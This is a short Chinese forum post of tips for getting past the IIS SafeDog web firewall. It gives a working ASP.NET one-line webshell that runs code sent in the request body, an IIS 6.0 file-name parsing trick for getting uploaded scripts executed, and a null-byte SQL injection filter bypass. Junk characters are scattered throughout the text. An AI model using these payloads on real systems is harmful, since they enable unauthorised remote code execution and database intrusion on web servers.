1、绕过IIS安全狗的一句话。
4 f/ _0 a: z( |8 u3 \前几天测试一个网站。找到突破口之后,写入webshell,但服务器上装有IIS安全狗,平时常用的一句话或者shell都用不了。下面这段.net一句话可以突破。' w# s v! ]4 C2 Z& v
<%@ Page Language="C#" ValidateRequest="false" %> <%try{System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["admin163.net"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null,null); } catch { }%>连接端用cncert的aspx一句话客户端。
& i* j$ u1 p% @3 ~ @- ?+ q/ D- J# Q, t7 {3 H
2、IIS6.0解析漏洞遇到安全狗。
* u' f1 B0 N; ?) G4 y文件名为
8 s4 H. c; f# Q* yhttp://www.xxxxx.com/sh3llc0de.asp;1.jpg/ i; g& G/ D" k* M D+ C; J" s% X
4 R8 R0 m0 f* f+ P1 C6 G
这样的会被IIS安全狗果断屏蔽。
5 D( Z5 ^# V3 e" b% L5 z+ W- R改成如下名称,IIS6一样会解析:$ U+ r5 V9 _* \0 P b6 O
www.xxxxx.com/;1.asp;1.jpg
9 W0 s0 [2 d# O2 d
# V8 S* P5 [$ ?* r; ^ [3、安全狗的注入绕过。4 r. b! g# v, [- H
常用的如r00ts.asp?id=1 and 1=1 是会被安全狗屏蔽的。
3 ?5 a! `" q+ S5 J但如果:
7 s( u" g$ Y" q4 r5 xr00ts.asp?r00ts.com=%00.&id=69%20 and 1=1
7 G' O4 _+ V8 V' A0 [就可以成功绕过了。# ?/ s0 m8 ]3 Y8 n
$ t& w/ {( @' O8 n' M2 u* H
7 y* I* A7 l- `3 u) c# U$ d |